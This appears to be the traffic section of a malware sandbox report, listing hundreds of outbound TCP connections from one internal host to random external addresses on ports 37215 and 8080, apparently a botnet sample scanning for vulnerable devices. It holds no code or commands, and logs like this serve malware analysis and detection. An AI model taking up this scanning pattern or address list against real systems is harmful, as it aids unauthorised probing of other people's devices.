Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.200.161.248:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.30.150.205:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.145.155.228:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.181.142.56:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.66.175.231:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.40.202.138:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.254.121.67:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.7.115.249:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.17.45.55:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.158.67.122:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.26.165.255:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.44.77.144:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.245.119.108:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.19.29.153:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.120.199.234:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.176.240.216:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.169.171.219:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.125.83.44:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.69.237.149:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.144.171.76:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.88.59.149:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.187.160.223:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.224.181.128:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.197.16.90:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.106.185.121:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.60.34.243:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.221.153.216:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.147.173.127:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.133.105.60:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.70.64.205:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.1.0.200:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.137.42.242:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.125.27.147:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.243.121.22:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.232.205.23:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.141.69.137:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.63.198.56:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.193.247.164:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.78.62.100:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.77.83.165:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.249.105.15:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.160.52.247:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.208.36.74:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.13.250.92:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.28.150.175:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.233.104.45:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.118.214.145:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.254.174.243:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.79.154.158:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.96.236.130:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.103.0.230:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.138.74.172:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.121.79.123:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.156.165.8:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.11.115.20:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.246.105.72:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.165.131.109:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.82.220.88:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.104.203.193:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.94.33.179:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.229.206.77:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.45.123.91:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.9.96.189:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.144.49.208:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.143.32.45:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.157.175.85:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.7.198.171:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.152.64.65:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.25.116.122:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.192.185.58:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.213.112.174:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.52.221.20:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.151.58.188:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.78.83.38:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.72.124.54:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.85.67.133:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.213.107.12:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.227.224.104:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.171.250.132:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.121.73.36:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.74.18.238:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.9.143.103:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.201.205.167:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.180.112.182:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.172.27.62:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.162.3.206:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.42.181.115:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.88.141.186:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.24.172.169:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.222.52.169:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.196.2.222:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.207.75.4:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.211.123.251:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.191.186.188:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.62.202.10:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.208.141.8:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.35.182.44:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.203.120.38:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.171.90.147:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.169.155.195:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.231.238.42:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.195.207.128:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.245.137.227:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.148.159.23:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.83.58.134:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.207.68.175:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.20.133.58:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.157.110.229:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.48.185.82:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.15.89.127:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.86.77.35:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.170.193.149:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.137.10.229:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.163.254.83:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.68.211.133:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.201.221.74:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.155.193.173:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.234.105.126:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.160.204.201:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.201.213.154:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.170.41.199:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.134.171.136:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.80.217.187:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.213.166.95:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.234.223.29:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.87.105.213:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.20.170.103:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.71.127.158:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.116.253.242:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.113.182.142:37215
Source: global traffic	TCP traffic: 192.168.2.15:8096 -> 197.122.65.5:37215
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.167.1.0:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.160.7.6:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.222.85.238:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.86.55.0:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.156.252.134:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.107.206.45:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.2.152.88:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.252.15.127:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.62.108.222:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.162.173.223:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.38.204.169:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.155.145.134:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.47.23.233:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.135.124.44:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.188.8.131:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.181.196.118:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.124.85.111:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.155.183.76:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.176.148.208:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.52.247.204:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.218.110.51:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.17.110.137:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.6.124.178:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.3.139.126:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.76.246.42:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.15.137.34:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.13.118.143:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.77.72.76:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.153.186.23:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.104.111.165:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.140.39.173:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.164.197.59:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.36.203.170:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.110.65.226:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.49.107.128:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.37.149.245:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.102.208.44:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.202.197.235:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.190.171.61:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.102.17.104:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.31.86.164:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.161.178.180:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.254.16.12:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.89.37.159:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.198.177.84:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.27.47.5:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.158.241.245:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.72.165.65:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.127.81.14:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.15.203.166:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.93.18.37:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.160.212.188:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.26.149.86:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.86.4.188:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.228.10.50:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.60.135.199:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.234.239.49:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.20.89.38:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.63.159.10:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.213.136.8:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.150.24.11:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.178.119.159:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.203.54.185:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.135.222.222:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.171.201.2:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.214.252.213:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.58.142.114:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.75.114.100:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.92.63.254:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.118.144.159:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.248.109.238:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.119.133.26:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.59.69.6:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.197.248.188:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.15.190.253:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.163.226.161:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.45.195.220:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.209.86.162:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.153.100.151:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.148.3.127:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.27.206.176:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.52.242.21:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.143.136.104:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.68.222.95:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.43.60.78:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.199.153.249:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.246.246.16:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.126.235.239:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.97.19.58:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.36.194.71:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.31.198.250:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.149.187.159:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.176.254.75:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.45.194.139:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.193.201.134:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.200.109.105:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.249.187.238:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.136.176.185:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.86.158.37:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.77.230.38:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.73.144.85:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.115.148.48:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.80.241.31:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.111.23.235:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.22.241.75:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.101.65.97:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.238.102.61:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.6.108.251:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.116.44.14:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.11.223.238:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.20.190.247:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.53.157.124:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.195.215.243:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.207.6.146:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.11.180.72:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.177.199.207:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.74.123.186:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.147.117.225:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.111.244.65:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.93.51.146:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.74.239.218:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.245.74.73:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.186.210.196:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.242.38.87:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.83.168.24:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.48.220.242:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.78.15.20:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.212.254.233:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.81.73.197:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.192.117.165:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.81.193.179:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.214.98.101:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.124.156.127:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.139.91.100:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.41.231.46:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.120.32.187:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.233.164.234:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.88.124.144:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.240.249.36:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.171.12.118:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.39.243.70:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.203.67.178:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.111.32.6:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.81.227.191:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.228.140.250:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.109.30.194:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.255.134.61:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.236.65.53:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.207.243.144:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.164.143.181:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.26.205.44:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.101.198.94:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.176.205.73:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.192.30.247:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.61.135.248:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.237.29.208:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.195.79.164:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.228.29.226:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.0.24.103:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.87.51.192:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.130.55.147:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.129.117.165:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.170.82.18:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.252.122.83:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.127.88.40:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.66.47.157:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.89.75.16:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.100.255.173:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.178.163.222:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.212.209.251:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.94.134.209:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.151.228.253:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.42.158.173:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.10.20.251:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.179.121.15:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.151.70.92:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.152.223.159:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.176.128.180:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.207.76.208:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.40.52.63:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.187.233.228:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.188.191.13:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.156.98.0:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.110.22.79:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.240.167.223:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.226.230.39:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.69.177.114:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.86.153.161:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.170.148.158:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.110.167.124:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.6.195.207:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.37.3.22:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.79.146.231:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.34.117.55:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.254.185.196:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.195.251.220:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.191.185.22:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.212.51.47:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.11.247.99:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.190.120.44:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.130.227.38:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.45.73.98:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.175.26.14:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.2.26.56:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.255.153.0:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.200.154.80:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.2.147.33:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.235.86.1:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.54.142.238:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.73.103.64:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.115.254.169:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.59.137.15:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.230.215.136:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.241.227.105:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.240.92.249:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.155.36.30:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.106.174.178:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.24.69.189:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.32.215.137:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.74.132.169:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.188.101.137:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.124.177.218:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.104.61.250:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 95.70.95.132:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.249.39.64:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.224.89.108:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.215.150.193:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 94.107.188.51:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.122.141.152:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.43.92.75:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 85.177.139.217:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 62.105.1.229:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.242.96.157:8080
Source: global traffic	TCP traffic: 192.168.2.15:6752 -> 31.64.7.176:8080
